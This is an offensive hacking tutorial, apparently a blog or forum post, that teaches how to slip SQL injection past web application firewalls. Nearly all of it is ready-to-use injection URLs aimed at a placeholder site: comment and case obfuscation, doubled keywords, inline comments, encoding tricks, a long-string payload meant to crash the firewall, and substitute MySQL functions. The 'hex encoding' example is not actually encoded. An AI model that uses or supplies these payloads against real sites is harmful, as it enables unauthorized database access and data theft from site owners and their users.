Today I'am Going To Show You How To Bypass Web Application Firewalls (WAF),
Let's Begin!
How To Knw If There Is A Web Application Firewall?
This Is Pretty Simple! When you Try To Enter A Command Used For SQL Injections (Usually The "UNION SELECT" Command), You Get An 403 Error (And The Website Says "Forbidden" Or "Not Acceptable").
Example:
Code: http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4,5....
(WE GET A 403 ERROR)
Basic/Simple Methods:
First, Ofcourse, We Need To Know The Basic Methods To Bypass WAF....
1)Comment's:
You Can Use Comment's To Bypass WAF:
Code: http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT 1,2,3,4,5...
(First Method That Can Bypass WAF)
However, Most WAF Identify This Method So They Still Show A "Forbidden Error"
2) Change The Case Of Latter's:
You Can Also Change The Case Of The Command:
Code: http://www.site.com/index.php?page_id=-15 UnIoN SeLEcT 1,2,3,4,5...
(Another Basic Method To Bypass WAF!)
However, As Before, This Trick Is Also Detected By Most WAF!
3)Combine The Previous Method's:
What You Can Also Do Is To Combine The Previous Two Method's:
Code: http://www.site.com/index.php?page_id=-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5....
This Method Is Not Detectable By Many Web Application Firewalls!
4)Replaced Keyword's:
Some Firewalls Remove The "UNION SELECT" Statement When It Is Found In The URL.. We Can Do This To Exploit This Function:
Code: http://www.site.com/index.php?page_id=-15 UNIunionON SELsectECT 1,2,3,4,5...
(The "Union" And The "Select" Will Be Removed, So The Final Result Will Be: "UNION SELECT")
This Method Doesn't Work On A: FIRWALLS, As Only Some Of Them Remove The "UNION" And The "SELECT" Command's When They Are Detected!
5)Inline Comment's
Some Firewalls Get Bypassed By Inserting Inline Comment's Between The "Union" And The "Select"
Command's:
Code: http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4,5..
(The U Is Equal To "U" And S To "S". See More On The Advanced Sectioons...)
I Believe That These Are The Most basic Method's To WAD Bypassing! Let's Move On More Advanced Ones...
Advanced Method's:
Now That You Have Learned About Basic WAF Bypassing. I Think It Is Good To Understand More Advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls Are Developed In C/C++ And We Can Crash Then Using Buffer Overflow!
Code: http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn**/+/*!SeLECt*/+1,2,3,4,5....
( You Can Test If The WAF Can Be Crashed Typing:
?page_id=null
/**//*!50000UnIOn//*yoyu*/all/**/
/*!SeLEct*/
/*nna*/+1,2,3,4,5...
If You Get 500, You Can Exploit It Using Buffer Overflow Method!
2)Replace Characters With Their HEX Values
We Can Replace Some Characters With Their HEX (URL-Encoded) Values.
Example:
Code: http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4,5...
(Which Means "UNION SELECT")
Text To Hex Encoder (Choose The "Hec Encoded For URL"
Result!): http://www.swingnote.com/tools/texttohex.php
3) Use Other Variables Commands Instead Of The Common Ones For SQLi:
Apart From The "UNION SELECT" Other Commands Might Be Blocked.
Common Commands Blocked
Code:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference Between Concat() And concat_ws(): http://is.gdVEeiDU
group_concat() | concat_ws()
[!]-> You Can Also Try To SQL Inject With The NAME_CONST Method: http://is.gd/o10i0d (Created By DOWNFALL)
Learning MySQL Really Helps On Such Issues!
4) Misc Exploitable Functions:
Many Firewalls Try To Offer More Protection By Adding Prototype Or Strange Functions! (Which, Ofcource, We Can Exploit!):
Example:
The Firewall Below Replaces "*" (ASTERISKS) With Whitespaces! What We Can Do Is This:
Code: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4,5....
(If The Firewall Removes The "*", The Result Will Be: 15+union+select...)
So If You Find Such A Sily Function, You Can Exploit It, In This Way!
[+]In Addition To The Previous Example, Some Other Bypasses Might Be:
Code:
-15+(uNioN+(sElECt)...
-15+uNioN+SeleCT)+...
-15+(UnI(oN)+(SeL)(ecT)+..
-15+union (select 1,2,3,4,5...
-15+/*!50000UNION*/+SELECT+1,2,3,4,5...
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil
0 comments:
Post a Comment